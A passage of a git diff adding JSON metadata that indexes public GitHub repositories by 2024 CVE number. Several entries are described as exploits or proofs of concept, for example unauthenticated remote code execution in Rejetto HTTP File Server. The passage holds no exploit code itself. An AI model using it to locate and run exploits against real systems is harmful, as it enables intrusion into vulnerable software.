"subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23443.json b/2024/CVE-2024-23443.json new file mode 100644 index 0000000000..f2a9913ec8 --- /dev/null +++ b/2024/CVE-2024-23443.json @@ -0,0 +1,33 @@ +[ + { + "id": 759231276, + "name": "osquery_cve-2024-23443", + "full_name": "zhazhalove\/osquery_cve-2024-23443", + "owner": { + "login": "zhazhalove", + "id": 12418559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12418559?v=4", + "html_url": "https:\/\/github.com\/zhazhalove", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhazhalove\/osquery_cve-2024-23443", + "description": "Osqery extension HP BIOS WMI", + "fork": false, + "created_at": "2024-02-18T02:15:44Z", + "updated_at": "2024-09-28T12:31:41Z", + "pushed_at": "2024-09-28T12:30:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23652.json b/2024/CVE-2024-23652.json new file mode 100644 index 0000000000..cfab7d7c2a --- /dev/null +++ b/2024/CVE-2024-23652.json @@ -0,0 +1,33 @@ +[ + { + "id": 765626764, + "name": "CVE-2024-23652", + "full_name": "abian2\/CVE-2024-23652", + "owner": { + "login": "abian2", + "id": 156372457, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/156372457?v=4", + "html_url": "https:\/\/github.com\/abian2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abian2\/CVE-2024-23652", + "description": null, + "fork": false, + "created_at": "2024-03-01T09:50:00Z", + "updated_at": "2024-03-01T09:50:51Z", + "pushed_at": "2024-03-01T09:50:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23653.json b/2024/CVE-2024-23653.json new file mode 100644 index 0000000000..52b1aec9dd --- /dev/null +++ b/2024/CVE-2024-23653.json @@ -0,0 +1,33 @@ +[ + { + "id": 903010615, + "name": "CVE-2024-23653", + "full_name": "666asd\/CVE-2024-23653", + "owner": { + "login": "666asd", + "id": 16465586, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16465586?v=4", + "html_url": "https:\/\/github.com\/666asd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/666asd\/CVE-2024-23653", + "description": null, + "fork": false, + "created_at": "2024-12-13T18:27:39Z", + "updated_at": "2024-12-18T17:32:00Z", + "pushed_at": "2024-12-18T17:31:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23692.json b/2024/CVE-2024-23692.json new file mode 100644 index 0000000000..12bc3c465a --- /dev/null +++ b/2024/CVE-2024-23692.json @@ -0,0 +1,379 @@ +[ + { + "id": 813486426, + "name": "CVE-2024-23692", + "full_name": "k3lpi3b4nsh33\/CVE-2024-23692", + "owner": { + "login": "k3lpi3b4nsh33", + "id": 118002757, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4", + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-11T07:21:04Z", + "updated_at": "2024-06-14T19:21:27Z", + "pushed_at": "2024-06-11T08:05:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814492032, + "name": "CVE-2024-23692-RCE-in-Rejetto-HFS", + "full_name": "jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2024-23692-RCE-in-Rejetto-HFS", + "description": "Unauthenticated RCE Flaw in Rejetto HTTP File Server (CVE-2024-23692)", + "fork": false, + "created_at": "2024-06-13T06:00:24Z", + "updated_at": "2024-12-16T15:23:00Z", + "pushed_at": "2024-06-13T07:00:23Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814570994, + "name": "CVE-2024-23692", + "full_name": "vanboomqi\/CVE-2024-23692", + "owner": { + "login": "vanboomqi", + "id": 97789149, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97789149?v=4", + "html_url": "https:\/\/github.com\/vanboomqi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vanboomqi\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-13T09:12:06Z", + "updated_at": "2024-11-20T16:30:49Z", + "pushed_at": "2024-06-15T15:30:45Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814670168, + "name": "CVE-2024-23692-RCE", + "full_name": "WanLiChangChengWanLiChang\/CVE-2024-23692-RCE", + "owner": { + "login": "WanLiChangChengWanLiChang", + "id": 171075497, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4", + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-23692-RCE", + "description": null, + "fork": false, + "created_at": "2024-06-13T13:13:10Z", + "updated_at": "2024-06-13T14:43:57Z", + "pushed_at": "2024-06-13T14:43:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814916351, + "name": "CVE-2024-23692", + "full_name": "Mr-r00t11\/CVE-2024-23692", + "owner": { + "login": "Mr-r00t11", + "id": 68824333, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68824333?v=4", + "html_url": "https:\/\/github.com\/Mr-r00t11", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Mr-r00t11\/CVE-2024-23692", + "description": null, + "fork": false, + "created_at": "2024-06-14T01:33:19Z", + "updated_at": "2024-06-14T01:47:48Z", + "pushed_at": "2024-06-14T01:47:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815792680, + "name": "CVE-2024-23692-exp", + "full_name": "Tupler\/CVE-2024-23692-exp", + "owner": { + "login": "Tupler", + "id": 42026413, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42026413?v=4", + "html_url": "https:\/\/github.com\/Tupler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tupler\/CVE-2024-23692-exp", + "description": "CVE-2024-23692 exp", + "fork": false, + "created_at": "2024-06-16T07:04:01Z", + "updated_at": "2024-06-16T07:05:17Z", + "pushed_at": "2024-06-16T07:05:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816201672, + "name": "CVE-2024-23692", + "full_name": "BBD-YZZ\/CVE-2024-23692", + "owner": { + "login": "BBD-YZZ", + "id": 132546612, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132546612?v=4", + "html_url": "https:\/\/github.com\/BBD-YZZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BBD-YZZ\/CVE-2024-23692", + "description": "CVE-2024-23692", + "fork": false, + "created_at": "2024-06-17T08:46:48Z", + "updated_at": "2024-11-24T09:02:19Z", + "pushed_at": "2024-06-18T01:23:58Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 816587020, + "name": "CVE-2024-23692-EXP", + "full_name": "0x20c\/CVE-2024-23692-EXP", + "owner": { + "login": "0x20c", + "id": 25526653, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25526653?v=4", + "html_url": "https:\/\/github.com\/0x20c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x20c\/CVE-2024-23692-EXP", + "description": "CVE-2024-23692 Exploit", + "fork": false, + "created_at": "2024-06-18T03:27:47Z", + "updated_at": "2024-11-28T01:52:30Z", + "pushed_at": "2024-06-18T04:06:25Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 826630505, + "name": "Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "full_name": "pradeepboo\/Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "owner": { + "login": "pradeepboo", + "id": 66199235, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66199235?v=4", + "html_url": "https:\/\/github.com\/pradeepboo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pradeepboo\/Rejetto-HFS-2.x-RCE-CVE-2024-23692", + "description": "Rejetto HTTP File Server (HFS) 2.x - Unauthenticated RCE exploit module (CVE-2024-23692)", + "fork": false, + "created_at": "2024-07-10T04:44:27Z", + "updated_at": "2024-08-04T03:30:48Z", + "pushed_at": "2024-07-10T04:55:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 857714170, + "name": "CVE-2024-23692", + "full_name": "verylazytech\/CVE-2024-23692", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-23692", + "description": "POC - Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692 ", + "fork": false, + "created_at": "2024-09-15T12:15:35Z", + "updated_at": "2025-01-07T03:06:59Z", + "pushed_at": "2024-11-26T14:45:12Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-23692", + "rce-exploit", + "rejetto-http-file-server", + "unauthenticated-rce" + ], + "visibility": "public", + "forks": 15, + "watchers": 35, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 892922028, + "name": "cve-2024-23692-poc", + "full_name": "XiaomingX\/cve-2024-23692-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-23692-poc", + "description": "CVE-2024-23692 是影响 Rejetto HTTP File Server(HFS)2.3m 及之前版本的模板注入漏洞。该漏洞允许远程未授权的攻击者通过发送特制的 HTTP 请求,在受影响的系统上执行任意命令。", + "fork": false, + "created_at": "2024-11-23T03:59:13Z", + "updated_at": "2024-12-08T18:37:04Z", + "pushed_at": "2024-11-23T04:00:55Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 906538490, + "name": "HFS2.3_poc", + "full_name": "NingXin2002\/HFS2.3_poc", + "owner": { + "login": "NingXin2002", + "id": 138864342, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/138864342?v=4", + "html_url": "https:\/\/github.com\/NingXin2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NingXin2002\/HFS2.3_poc", + "description": "HFS2.3未经身份验证的远程代码执行(CVE-2024-23692)", + "fork": false, + "created_at": "2024-12-21T07:13:11Z", + "updated_at": "2024-12-26T16:21:28Z", + "pushed_at": "2024-12-21T07:14:26Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23708.json b/2024/CVE-2024-23708.json new file mode 100644 index 0000000000..0a46ca3797 --- /dev/null +++ b/2024/CVE-2024-23708.json @@ -0,0 +1,33 @@ +[ + { + "id": 839858072, + "name": "CVE-2024-23708", + "full_name": "uthrasri\/CVE-2024-23708", + "owner": { + "login": "uthrasri", + "id": 145666390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/uthrasri\/CVE-2024-23708", + "description": null, + "fork": false, + "created_at": "2024-08-08T13:16:58Z", + "updated_at": "2024-08-08T13:28:22Z", + "pushed_at": "2024-08-08T13:28:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23709.json b/2024/CVE-2024-23709.json new file mode 100644 index 0000000000..844dacce68 --- /dev/null +++ b/2024/CVE-2024-23709.json @@ -0,0 +1,33 @@ +[ + { + "id": 841887434, + "name": "external_sonivox_CVE-2024-23709", + "full_name": "AbrarKhan\/external_sonivox_CVE-2024-23709", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/external_sonivox_CVE-2024-23709", + "description": null, + "fork": false, + "created_at": "2024-08-13T08:44:25Z", + "updated_at": "2024-10-22T08:57:01Z", + "pushed_at": "2024-08-13T08:52:23Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23722.json b/2024/CVE-2024-23722.json new file mode 100644 index 0000000000..42003ec1bf --- /dev/null +++ b/2024/CVE-2024-23722.json @@ -0,0 +1,33 @@ +[ + { + "id": 777360363, + "name": "CVE-2024-23722-poc", + "full_name": "alexcote1\/CVE-2024-23722-poc", + "owner": { + "login": "alexcote1", + "id": 22797946, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22797946?v=4", + "html_url": "https:\/\/github.com\/alexcote1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alexcote1\/CVE-2024-23722-poc", + "description": null, + "fork": false, + "created_at": "2024-03-25T17:50:33Z", + "updated_at": "2024-03-26T13:12:34Z", + "pushed_at": "2024-05-08T19:33:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23727.json b/2024/CVE-2024-23727.json new file mode 100644 index 0000000000..e00c9e32f9 --- /dev/null +++ b/2024/CVE-2024-23727.json @@ -0,0 +1,36 @@ +[ + { + "id": 714795483, + "name": "yi", + "full_name": "actuator\/yi", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/yi", + "description": "CVE-2023-47882 | CVE-2024-23727", + "fork": false, + "created_at": "2023-11-05T20:37:24Z", + "updated_at": "2024-03-24T16:26:09Z", + "pushed_at": "2024-03-24T16:16:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-47882", + "cve-2024-23727" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23738.json b/2024/CVE-2024-23738.json new file mode 100644 index 0000000000..832dc3aa0c --- /dev/null +++ b/2024/CVE-2024-23738.json @@ -0,0 +1,33 @@ +[ + { + "id": 748194668, + "name": "CVE-2024-23738", + "full_name": "giovannipajeu1\/CVE-2024-23738", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23738", + "description": "CVE-2024-23738", + "fork": false, + "created_at": "2024-01-25T13:27:19Z", + "updated_at": "2024-01-28T09:51:00Z", + "pushed_at": "2024-01-25T13:32:14Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23739.json b/2024/CVE-2024-23739.json new file mode 100644 index 0000000000..0374e98090 --- /dev/null +++ b/2024/CVE-2024-23739.json @@ -0,0 +1,33 @@ +[ + { + "id": 748201476, + "name": "CVE-2024-23739", + "full_name": "giovannipajeu1\/CVE-2024-23739", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23739", + "description": "CVE-2024-23739", + "fork": false, + "created_at": "2024-01-25T13:44:16Z", + "updated_at": "2024-03-06T02:09:46Z", + "pushed_at": "2024-01-25T13:48:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23740.json b/2024/CVE-2024-23740.json new file mode 100644 index 0000000000..567dbd02a5 --- /dev/null +++ b/2024/CVE-2024-23740.json @@ -0,0 +1,33 @@ +[ + { + "id": 748198610, + "name": "CVE-2024-23740", + "full_name": "giovannipajeu1\/CVE-2024-23740", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23740", + "description": " CVE-2024-23739", + "fork": false, + "created_at": "2024-01-25T13:37:08Z", + "updated_at": "2024-01-25T13:43:33Z", + "pushed_at": "2024-01-25T13:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23741.json b/2024/CVE-2024-23741.json new file mode 100644 index 0000000000..5f9f44cf8f --- /dev/null +++ b/2024/CVE-2024-23741.json @@ -0,0 +1,33 @@ +[ + { + "id": 748203643, + "name": "CVE-2024-23741", + "full_name": "giovannipajeu1\/CVE-2024-23741", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23741", + "description": "CVE-2024-23741", + "fork": false, + "created_at": "2024-01-25T13:49:10Z", + "updated_at": "2024-01-25T13:49:10Z", + "pushed_at": "2024-01-25T13:51:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23742.json b/2024/CVE-2024-23742.json new file mode 100644 index 0000000000..445f34887a --- /dev/null +++ b/2024/CVE-2024-23742.json @@ -0,0 +1,33 @@ +[ + { + "id": 748204912, + "name": "CVE-2024-23742", + "full_name": "giovannipajeu1\/CVE-2024-23742", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23742", + "description": "CVE-2024-23742", + "fork": false, + "created_at": "2024-01-25T13:52:05Z", + "updated_at": "2024-01-26T05:58:50Z", + "pushed_at": "2024-01-25T13:55:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23743.json b/2024/CVE-2024-23743.json new file mode 100644 index 0000000000..dd552d0ff5 --- /dev/null +++ b/2024/CVE-2024-23743.json @@ -0,0 +1,33 @@ +[ + { + "id": 733590093, + "name": "CVE-2024-23743", + "full_name": "giovannipajeu1\/CVE-2024-23743", + "owner": { + "login": "giovannipajeu1", + "id": 83291215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83291215?v=4", + "html_url": "https:\/\/github.com\/giovannipajeu1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/giovannipajeu1\/CVE-2024-23743", + "description": null, + "fork": false, + "created_at": "2023-12-19T17:07:27Z", + "updated_at": "2024-03-12T06:08:21Z", + "pushed_at": "2024-01-25T13:56:48Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23745.json b/2024/CVE-2024-23745.json new file mode 100644 index 0000000000..e03d1b40a6 --- /dev/null +++ b/2024/CVE-2024-23745.json @@ -0,0 +1,33 @@ +[ + { + "id": 748384236, + "name": "CVE-2024-23745", + "full_name": "louiselalanne\/CVE-2024-23745", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23745", + "description": "In Notion Web Clipper 1.0.3(7), a .nib file is susceptible to the Dirty NIB attack.", + "fork": false, + "created_at": "2024-01-25T21:20:40Z", + "updated_at": "2024-03-12T08:48:47Z", + "pushed_at": "2024-01-25T22:15:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23746.json b/2024/CVE-2024-23746.json new file mode 100644 index 0000000000..322af3587c --- /dev/null +++ b/2024/CVE-2024-23746.json @@ -0,0 +1,33 @@ +[ + { + "id": 748435064, + "name": "CVE-2024-23746", + "full_name": "louiselalanne\/CVE-2024-23746", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23746", + "description": "Miro Desktop 0.8.18 on macOS allows Electron code injection.", + "fork": false, + "created_at": "2024-01-26T00:39:20Z", + "updated_at": "2024-07-30T16:17:02Z", + "pushed_at": "2024-01-26T14:00:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23747.json b/2024/CVE-2024-23747.json new file mode 100644 index 0000000000..87e2bafc91 --- /dev/null +++ b/2024/CVE-2024-23747.json @@ -0,0 +1,33 @@ +[ + { + "id": 748435966, + "name": "CVE-2024-23747", + "full_name": "louiselalanne\/CVE-2024-23747", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2024-23747", + "description": "Moderna Sistemas ModernaNet Hospital Management System 2024 is susceptible to an Insecure Direct Object Reference (IDOR) vulnerability", + "fork": false, + "created_at": "2024-01-26T00:43:29Z", + "updated_at": "2024-01-26T00:43:30Z", + "pushed_at": "2024-01-26T09:32:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23772.json b/2024/CVE-2024-23772.json new file mode 100644 index 0000000000..cb9de88c86 --- /dev/null +++ b/2024/CVE-2024-23772.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041144, + "name": "CVE-2024-23772", + "full_name": "Verrideo\/CVE-2024-23772", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23772", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:58:33Z", + "updated_at": "2024-02-05T10:58:33Z", + "pushed_at": "2024-02-05T11:04:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-23773.json b/2024/CVE-2024-23773.json new file mode 100644 index 0000000000..a43d40c1ba --- /dev/null +++ b/2024/CVE-2024-23773.json @@ -0,0 +1,33 @@ +[ + { + "id": 753041259, + "name": "CVE-2024-23773", + "full_name": "Verrideo\/CVE-2024-23773", + "owner": { + "login": "Verrideo", + "id": 33281087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33281087?v=4", + "html_url": "https:\/\/github.com\/Verrideo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Verrideo\/CVE-2024-23773", + "description": null, + "fork": false, + "created_at": "2024-02-05T10:58:50Z", + "updated_at": "2024-02-05T10:58:51Z", + "pushed_at": "2024-02-05T11:03:54Z", + 